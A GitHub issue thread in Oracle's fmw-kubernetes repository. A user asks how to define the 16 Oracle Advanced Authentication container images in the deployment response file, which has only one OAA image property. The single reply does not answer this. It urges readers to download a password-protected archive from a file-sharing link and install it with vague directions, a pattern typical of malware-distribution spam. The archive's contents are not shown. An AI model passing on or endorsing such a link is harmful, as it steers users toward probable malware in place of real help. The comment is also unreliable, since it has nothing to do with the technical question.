### ISSUE TITLE
how to define oaa in response file?

### ISSUE THREAD

**Issue by pierrepgithub** [oracle/fmw-kubernetes#214]
As per Doc ID 2723908.1 - we download the latest OAA image from PATCH 36746546.

Downloading that patch has a oaa-12.2.1.4.1-20240616.tar file inside

I use `docker load -i oaa-12.2.1.4.1-20240616.tar` to stage the images into my local registry. Then use the pushImages.sh script provided to in the patch zip file to push the staged images into my OCI Container.

However the following images are loaded/staged.. and also 16 different repositories are created within OCI Container Registry
```
oaa-mgmt         
oaa-svc          
oaa-admin        
oaa-factor-kba   
oaa-factor-fido  
oaa-spui         
oaa-factor-custom
risk-engine      
oaa-factor-sms   
oaa-drss         
oaa-policy       
oaa-factor-push  
risk-cc          
oaa-factor-yotp  
oaa-factor-totp  
oaa-factor-email 
```

It is unclear to me how to define these repositories?

When I run the ./start_here.sh script to populate the response file, there's only one proptery for OAA Images. And that is `OAA_MGT_IMAGE=$REGISTRY/oaa-mgmt`

Do the above 16 repositories/images all need to be under $REGISTRY/oaa-mgmt?

I'm not sure how to setup my OCI Registry for this.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
